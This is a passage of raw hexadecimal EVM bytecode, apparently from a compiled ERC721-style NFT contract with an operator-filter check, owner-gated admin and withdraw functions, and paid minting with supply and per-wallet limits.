0565b005b34801561032557600080fd5b50610340600480360381019061033b9190614015565b610cea565b60405161034d9190614051565b60405180910390f35b34801561036257600080fd5b5061036b610d02565b6040516103789190614051565b60405180910390f35b34801561038d57600080fd5b506103a860048036038101906103a3919061406c565b610d0b565b005b3480156103b657600080fd5b506103d160048036038101906103cc9190613fd5565b610e5b565b6040516103de9190614051565b60405180910390f35b3480156103f357600080fd5b506103fc61104b565b6040516104099190614051565b60405180910390f35b34801561041e57600080fd5b50610427611051565b005b34801561043557600080fd5b50610450600480360381019061044b919061406c565b611230565b005b34801561045e57600080fd5b50610467611380565b6040516104749190614051565b60405180910390f35b34801561048957600080fd5b506104a4600480360381019061049f9190613f20565b611386565b6040516104b19190614051565b60405180910390f35b3480156104c657600080fd5b506104e160048036038101906104dc9190613f20565b6113d9565b005b3480156104ef57600080fd5b5061050a60048036038101906105059190613f20565b6114be565b6040516105179190613f8e565b60405180910390f35b34801561052c57600080fd5b506105356114d4565b6040516105429190614051565b60405180910390f35b34801561055757600080fd5b506105606114de565b60405161056d9190613ec8565b60405180910390f35b34801561058257600080fd5b5061059d60048036038101906105989190614015565b61156c565b6040516105aa9190614051565b60405180910390f35b3480156105bf57600080fd5b506105c8611654565b005b3480156105d657600080fd5b506105df61173b565b005b3480156105ed57600080fd5b506105f6611842565b6040516106039190613f8e565b60405180910390f35b34801561061857600080fd5b50610633600480360381019061062e9190613f20565b61186c565b005b34801561064157600080fd5b5061064a611951565b6040516106579190613ec8565b60405180910390f35b34801561066c57600080fd5b5061068760048036038101906106829190613fd5565b6119e3565b005b34801561069557600080fd5b5061069e611acc565b6040516106ab9190614051565b60405180910390f35b6106ce60048036038101906106c99190613f20565b611ad2565b005b3480156106dc57600080fd5b506106f760048036038101906106f291906141f4565b61214b565b005b34801561070557600080fd5b50610720600480360381019061071b9190614269565b612239565b005b34801561072e57600080fd5b50610737612343565b6040516107449190614051565b60405180910390f35b34801561075957600080fd5b50610774600480360381019061076f91906142a9565b61234d565b005b34801561078257600080fd5b5061079d6004803603810190610798919061438a565b6124d0565b005b3480156107ab57600080fd5b506107b4612623565b6040516107c19190614051565b60405180910390f35b3480156107d657600080fd5b506107f160048036038101906107ec9190613f20565b612629565b6040516107fe9190613ec8565b60405180910390f35b34801561081357600080fd5b5061081c6126dc565b6040516108299190613e1d565b60405180910390f35b34801561083e57600080fd5b506108476126ef565b6040516108549190614051565b60405180910390f35b34801561086957600080fd5b506108726126f5565b60405161087f9190614051565b60405180910390f35b34801561089457600080fd5b506108af60048036038101906108aa9190613f20565b6126fb565b005b3480156108bd57600080fd5b506108d860048036038101906108d3919061440d565b6127e0565b6040516108e59190613e1d565b60405180910390f35b3480156108fa57600080fd5b5061091560048036038101906109109190614015565b612874565b005b34801561092357600080fd5b5061093e60048036038101906109399190614015565b6129ca565b60405161094b9190614051565b60405180910390f35b34801561096057600080fd5b506109696129e2565b6040516109769190614051565b60405180910390f35b60007f80ac58cd000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff19161480610a4a57507f5b5e139f000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b80610ab257507f780e9d63000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b80610ac25750610ac1826129e8565b5b9050919050565b606060018054610ad89061447c565b80601f0160208091040260200160405190810160405280929190818152602001828054610b049061447c565b8015610b515780601f10610b2657610100808354040283529160200191610b51565b820191906000526020600020905b815481529060010190602001808311610b3457829003601f168201915b5050505050905090565b6000610b6682612a52565b610ba5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b9c9061451f565b60405180910390fd5b6005600083815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050919050565b8160006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115610cdb576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430836040518363ffffffff1660e01b8152600401610c5892919061453f565b602060405180830381865afa158015610c75573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610c99919061457d565b610cda57806040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610cd19190613f8e565b60405180910390fd5b5b610ce58383612a5f565b505050565b60146020528060005260406000206000915090505481565b60008054905090565b8260006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115610e49573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610d7d57610d78848484612b77565b610e55565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b8152600401610dc692919061453f565b602060405180830381865afa158015610de3573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610e07919061457d565b610e4857336040517fede71dcc000000000000000000000000000000000000000000000000000000008152600401610e3f9190613f8e565b60405180910390fd5b5b610e54848484612b77565b5b50505050565b6000610e668361156c565b8210610ea7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e9e9061461c565b60405180910390fd5b6000610eb1610d02565b905060008060005b83811015611009576000600360008381526020019081526020016000206040518060400160405290816000820160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020016000820160149054906101000a900467ffffffffffffffff1667ffffffffffffffff1667ffffffffffffffff16815250509050600073ffffffffffffffffffffffffffffffffffffffff16816000015173ffffffffffffffffffffffffffffffffffffffff1614610fab57806000015192505b8773ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610ffb57868403610ff2578195505050505050611045565b83806001019450505b508080600101915050610eb9565b506040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161103c906146ae565b60405180910390fd5b92915050565b600f5481565b611059612b87565b73ffffffffffffffffffffffffffffffffffffffff16611077611842565b73ffffffffffffffffffffffffffffffffffffffff1614806110ed575061109c612b87565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b61112c576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111239061471a565b60405180910390fd5b600260095403611171576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161116890614786565b60405180910390fd5b600260098190555060003373ffffffffffffffffffffffffffffffffffffffff164760405161119f906147d7565b60006040518083038185875af1925050503d80600081146111dc576040519150601f19603f3d011682016040523d82523d6000602084013e6111e1565b606091505b5050905080611225576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161121c90614838565b60405180910390fd5b506001600981905550565b8260006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b111561136e573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036112a25761129d848484612b8f565b61137a565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b81526004016112eb92919061453f565b602060405180830381865afa158015611308573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061132c919061457d565b61136d57336040517fede71dcc0000000000000000000000000000000000000000000000000000000081526004016113649190613f8e565b60405180910390fd5b5b611379848484612b8f565b5b50505050565b600e5481565b6000611390610d02565b82106113d1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113c8906148ca565b60405180910390fd5b819050919050565b6113e1612b87565b73ffffffffffffffffffffffffffffffffffffffff166113ff611842565b73ffffffffffffffffffffffffffffffffffffffff1614806114755750611424612b87565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6114b4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114ab9061471a565b60405180910390fd5b80600f8190555050565b60006114c982612baf565b600001519050919050565b6000600b54905090565b600a80546114eb9061447c565b80601f01602080910402602001604051908101604052809291908181526020018280546115179061447c565b80156115645780601f1061153957610100808354040283529160200191611564565b820191906000526020600020905b81548152906001019060200180831161154757829003601f168201915b505050505081565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036115dc576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115d39061495c565b60405180910390fd5b600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160009054906101000a90046fffffffffffffffffffffffffffffffff166fffffffffffffffffffffffffffffffff169050919050565b61165c612b87565b73ffffffffffffffffffffffffffffffffffffffff1661167a611842565b73ffffffffffffffffffffffffffffffffffffffff1614806116f0575061169f612b87565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b61172f576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016117269061471a565b60405180910390fd5b6117396000612d49565b565b611743612b87565b73ffffffffffffffffffffffffffffffffffffffff16611761611842565b73ffffffffffffffffffffffffffffffffffffffff1614806117d75750611786612b87565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611816576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161180d9061471a565b60405180910390fd5b601160009054906101000a900460ff1615601160006101000a81548160ff021916908315150217905550565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b611874612b87565b73ffffffffffffffffffffffffffffffffffffffff16611892611842565b73ffffffffffffffffffffffffffffffffffffffff16148061190857506118b7612b87565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611947576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161193e9061471a565b60405180910390fd5b80600b8190555050565b6060600280546119609061447c565b80601f016020809104026020016040519081016040528092919081815260200182805461198c9061447c565b80156119d95780601f106119ae576101008083540402835291602001916119d9565b820191906000526020600020905b8154815290600101906020018083116119bc57829003601f168201915b5050505050905090565b6119eb612b87565b73ffffffffffffffffffffffffffffffffffffffff16611a09611842565b73ffffffffffffffffffffffffffffffffffffffff161480611a7f5750611a2e612b87565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611abe576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ab59061471a565b60405180910390fd5b611ac88282612e0f565b5050565b600b5481565b6000600b54905060006001600f54611aea91906149ab565b83601254611af891906149ab565b108015611b455750600d54601360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054105b90508015611eaf57601160009054906101000a900460ff16611b9c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b9390614a2b565b60405180910390fd5b60105483611ba8610d02565b611bb291906149ab565b1115611bf3576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611bea90614a97565b60405180910390fd5b600c54831115611c38576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611c2f90614b03565b60405180910390fd5b601360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054600d54611c859190614b23565b8310611da15781601360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054600d54611cd99190614b23565b611ce39190614b57565b8284611cef9190614b57565b611cf99190614b23565b341015611d3b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d3290614be5565b60405180910390fd5b600d54601360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600d5460126000828254611d9591906149ab565b92505081905550611eaa565b601360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054600d54611dee9190614b23565b831015611ea9576000341015611e39576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e3090614be5565b60405180910390fd5b82601360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254611e8891906149ab565b925050819055508260126000828254611ea191906149ab565b925050819055505b5b6120e6565b601160009054906101000a900460ff16611efe576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ef590614a2b565b60405180910390fd5b600e5483601460003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054611f4c91906149ab565b1115611f8d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611f8490614c51565b60405180910390fd5b8183611f999190614b57565b341015611fdb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611fd290614be5565b60405180910390fd5b60105483611fe7610d02565b611ff191906149ab565b1115612032576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161202990614a97565b60405180910390fd5b600c54831115612077576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161206e90614b03565b60405180910390fd5b3273ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16146120e5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016120dc90614cbd565b60405180910390fd5b5b82601460003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461213591906149ab565b925050819055506121463384612e0f565b505050565b612153612b87565b73ffffffffffffffffffffffffffffffffffffffff16612171611842565b73ffffffffffffffffffffffffffffffffffffffff1614806121e75750612196612b87565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b612226576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161221d9061471a565b60405180910390fd5b80600a90816122359190614e89565b5050565b8160006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b1115612334576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430836040518363ffffffff1660e01b81526004016122b192919061453f565b602060405180830381865afa1580156122ce573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906122f2919061457d565b61233357806040517fede71dcc00000000000000000000000000000000000000000000000000000000815260040161232a9190613f8e565b60405180910390fd5b5b61233e8383612e2d565b505050565b6000600d54905090565b612355612b87565b73ffffffffffffffffffffffffffffffffffffffff16612373611842565b73ffffffffffffffffffffffffffffffffffffffff1614806123e95750612398612b87565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b612428576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161241f9061471a565b60405180910390fd5b6000821161246b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161246290614fa7565b60405180910390fd5b60105482612477610d02565b61248191906149ab565b11156124c2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016124b990615013565b60405180910390fd5b6124cc8183612e0f565b5050565b8360006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b111561260f573373ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036125435761253e85858585612fad565b61261c565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663c617113430336040518363ffffffff1660e01b815260040161258c92919061453f565b602060405180830381865afa1580156125a9573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906125cd919061457d565b61260e57336040517fede71dcc0000000000000000000000000000000000000000000000000000000081526004016126059190613f8e565b60405180910390fd5b5b61261b85858585612fad565b5b5050505050565b600d5481565b606061263482612a52565b612673576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161266a906150a5565b60405180910390fd5b600061267d613009565b9050600081511161269d57604051806020016040528060008152506126d4565b806126b36001856126ae91906149ab565b61309b565b6040516020016126c492919061514d565b6040516020818303038152906040525b915050919050565b601160009054906101000a900460ff1681565b60105481565b60125481565b612703612b87565b73ffffffffffffffffffffffffffffffffffffffff16612721611842565b73ffffffffffffffffffffffffffffffffffffffff1614806127975750612746612b87565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6127d6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016127cd9061471a565b60405180910390fd5b80600d8190555050565b6000600660008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16905092915050565b61287c612b87565b73ffffffffffffffffffffffffffffffffffffffff1661289a611842565b73ffffffffffffffffffffffffffffffffffffffff16148061291057506128bf612b87565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b61294f576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016129469061471a565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036129be576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016129b5906151ee565b60405180910390fd5b6129c781612d49565b50565b60136020528060005260406000206000915090505481565b600c5481565b60007f01ffc9a7000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916149050919050565b6000805482109050919050565b6000612a6a826114be565b90508073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603612ada576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612ad190615280565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16612af9612b87565b73ffffffffffffffffffffffffffffffffffffffff161480612b285750612b2781612b22612b87565b6127e0565b5b612b67576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612b5e90615312565b60405180910390fd5b612b728383836131fb565b505050565b612b828383836132ad565b505050565b600033905090565b612baa838383604051806020016040528060008152506124d0565b505050565b612bb7613d2f565b612bc082612a52565b612bff576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612bf6906153a4565b60405180910390fd5b60008290505b60008110612d08576000600360008381526020019081526020016000206040518060400160405290816000820160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020016000820160149054906101000a900467ffffffffffffffff1667ffffffffffffffff1667ffffffffffffffff16815250509050600073ffffffffffffffffffffffffffffffffffffffff16816000015173ffffffffffffffffffffffffffffffffffffffff1614612cf9578092505050612d44565b50808060019003915050612c05565b506040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612d3b90615436565b60405180910390fd5b919050565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b612e298282604051806020016040528060008152506137eb565b5050565b612e35612b87565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603612ea2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612e99906154a2565b60405180910390fd5b8060066000612eaf612b87565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff16612f5c612b87565b73ffffffffffffffffffffffffffffffffffffffff167f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c3183604051612fa19190613e1d565b60405180910390a35050565b612fb88484846132ad565b612fc4848484846137fd565b613003576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612ffa90615534565b60405180910390fd5b50505050565b6060600a80546130189061447c565b80601f01602080910402602001604051908101604052809291908181526020018280546130449061447c565b80156130915780601f1061306657610100808354040283529160200191613091565b820191906000526020600020905b81548152906001019060200180831161307457829003601f168201915b5050505050905090565b6060600082036130e2576040518060400160405280600181526020017f300000000000000000000000000000000000000000000000000000000000000081525090506131f6565b600082905060005b600082146131145780806130fd90615554565b915050600a8261310d91906155cb565b91506130ea565b60008167ffffffffffffffff8111156131305761312f6140c9565b5b6040519080825280601f01601f1916602001820160405280156131625781602001600182028036833780820191505090505b5090505b600085146131ef5760018261317b9190614b23565b9150600a8561318a91906155fc565b603061319691906149ab565b60f81b8183815181106131ac576131ab61562d565b5b60200101907effffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916908160001a905350600a856131e891906155cb565b9450613166565b8093505050505b919050565b826005600084815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550818373ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92560405160405180910390a4505050565b60006132b882612baf565b90506000816000015173ffffffffffffffffffffffffffffffffffffffff166132df612b87565b73ffffffffffffffffffffffffffffffffffffffff16148061333b5750613304612b87565b73ffffffffffffffffffffffffffffffffffffffff1661332384610b5b565b73ffffffffffffffffffffffffffffffffffffffff16145b8061335757506133568260000151613351612b87565b6127e0565b5b905080613399576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401613390906156ce565b60405180910390fd5b8473ffffffffffffffffffffffffffffffffffffffff16826000015173ffffffffffffffffffffffffffffffffffffffff161461340b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161340290615760565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff160361347a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401613471906157f2565b60405180910390fd5b6134878585856001613984565b61349760008484600001516131fb565b6001600460008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282829054906101000a90046fffffffffffffffffffffffffffffffff160392506101000a8154816fffffffffffffffffffffffffffffffff02191690836fffffffffffffffffffffffffffffffff1602179055506001600460008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282829054906101000a90046fffffffffffffffffffffffffffffffff160192506101000a8154816fffffffffffffffffffffffffffffffff02191690836fffffffffffffffffffffffffffffffff160217905550836003600085815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550426003600085815260200190815260200160002060000160146101000a81548167ffffffffffffffff021916908367ffffffffffffffff1602179055506000600184019050600073ffffffffffffffffffffffffffffffffffffffff166003600083815260200190815260200160002060000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff160361377b576136da81612a52565b1561377a5782600001516003600083815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555082602001516003600083815260200190815260200160002060000160146101000a81548167ffffffffffffffff021916908367ffffffffffffffff1602179055505b5b50828473ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a46137e4858585600161398a565b5050505050565b6137f88383836001613990565b505050565b600061381e8473ffffffffffffffffffffffffffffffffffffffff16613d0c565b15613977578373ffffffffffffffffffffffffffffffffffffffff1663150b7a02613847612b87565b8786866040518563ffffffff1660e01b81526004016138699493929190615867565b6020604051808303816000875af19250505080156138a557506040513d601f19601f820116820180604052508101906138a291906158c8565b60015b613927573d80600081146138d5576040519150601f19603f3d011682016040523d82523d6000602084013e6138da565b606091505b50600081510361391f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161391690615534565b60405180910390fd5b805181602001fd5b63150b7a0260e01b7bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916817bffffffffffffffffffffffffffffffffffffffffffffffffffffffff19161491505061397c565b600190505b949350505050565b50505050565b50505050565b600080549050600073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1603613a05576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016139fc90615967565b60405180910390fd5b60008403613a48576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401613a3f906159f9565b60405180910390fd5b613a556000868387613984565b83600460008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282829054906101000a90046fffffffffffffffffffffffffffffffff160192506101000a8154816fffffffffffffffffffffffffffffffff02191690836fffffffffffffffffffffffffffffffff16021790555083600460008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160108282829054906101000a90046fffffffffffffffffffffffffffffffff160192506101000a8154816fffffffffffffffffffffffffffffffff02191690836fffffffffffffffffffffffffffffffff160217905550846003600083815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550426003600083815260200190815260200160002060000160146101000a81548167ffffffffffffffff021916908367ffffffffffffffff160217905550600081905060005b85811015613cef57818773ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a48315613cda57613c9a60008884886137fd565b613cd9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401613cd090615534565b60405180910390fd5b5b81806001019250508080600101915050613c23565b508060008190555050613d05600086838761398a565b5050505050565b6000808273ffffffffffffffffffffffffffffffffffffffff163b119050919050565b6040518060400160405280600073ffffffffffffffffffffffffffffffffffffffff168152602001600067ffffffffffffffff1681525090565b6000604051905090565b600080fd5b600080fd5b60007fffffffff0000000000000000000000000000000000000000000000000000000082169050919050565b613db281613d7d565b8114613dbd57600080fd5b50565b600081359050613dcf81613da9565b92915050565b600060208284031215613deb57613dea613d73565b5b6000613df984828501613dc0565b91505092915050565b60008115159050919050565b613e1781613e02565b82525050565b6000602082019050613e326000830184613e0e565b92915050565b600081519050919050565b600082825260208201905092915050565b60005b83811015613e72578082015181840152602081019050613e57565b60008484015250505050565b6000601f19601f8301169050919050565b6000613e9a82613e38565b613ea48185613e43565b9350613eb4818560208601613e54565b613ebd81613e7e565b840191505092915050565b60006020820190508181036000830152613ee28184613e8f565b905092915050565b6000819050919050565b613efd81613eea565b8114613f0857600080fd5b50565b600081359050613f1a81613ef4565b92915050565b600060208284031215613f3657613f35613d73565b5b6000613f4484828501613f0b565b91505092915050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000613f7882613f4d565b9050919050565b613f8881613f6d565b82525050565b6000602082019050613fa36000830184613f7f565b92915050565b613fb281613f6d565b8114613fbd57600080fd5b50565b600081359050613fcf81613fa9565b92915050565b60008060408385031215613fec57613feb613d73565b5b6000613ffa85828601613fc0565b925050602061400b85828601613f0b565b9150509250929050565b60006020828403121561402b5761402a613d73565b5b600061403984828501613fc0565b91505092915050565b61404b81613eea565b82525050565b60006020820190506140666000830184614042565b92915050565b60008060006060848603121561408557614084613d73565b5b600061409386828701613fc0565b93505060206140a486828701613fc0565b92505060406140b586828701613f0b565b9150509250925092565b600080fd5b600080fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b61410182613e7e565b810181811067ffffffffffffffff821117156141205761411f6140c9565b5b80604052505050565b6000614133613d69565b905061413f82826140f8565b919050565b600067ffffffffffffffff82111561415f5761415e6140c9565b5b61416882613e7e565b9050602081019050919050565b82818337600083830152505050565b600061419761419284614144565b614129565b9050828152602081018484840111156141b3576141b26140c4565b5b6141be848285614175565b509392505050565b600082601f8301126141db576141da6140bf565b5b81356141eb848260208601614184565b91505092915050565b60006020828403121561420a57614209613d73565b5b600082013567ffffffffffffffff81111561422857614227613d78565b5b614234848285016141c6565b91505092915050565b61424681613e02565b811461425157600080fd5b50565b6000813590506142638161423d565b92915050565b600080604083850312156142805761427f613d73565b5b600061428e85828601613fc0565b925050602061429f85828601614254565b9150509250929050565b600080604083850312156142c0576142bf613d73565b5b60006142ce85828601613f0b565b92505060206142df85828601613fc0565b9150509250929050565b600067ffffffffffffffff821115614304576143036140c9565b5b61430d82613e7e565b9050602081019050919050565b600061432d614328846142e9565b614129565b905082815260208101848484011115614349576143486140c4565b5b614354848285614175565b509392505050565b600082601f830112614371576143706140bf565b5b813561438184826020860161431a565b91505092915050565b600080600080608085870312156143a4576143a3613d73565b5b60006143b287828801613fc0565b94505060206143c387828801613fc0565b93505060406143d487828801613f0b565b925050606085013567ffffffffffffffff8111156143f5576143f4613d78565b5b6144018782880161435c565b91505092959194509250565b6000806040838503121561442457614423613d73565b5b600061443285828601613fc0565b925050602061444385828601613fc0565b9150509250929050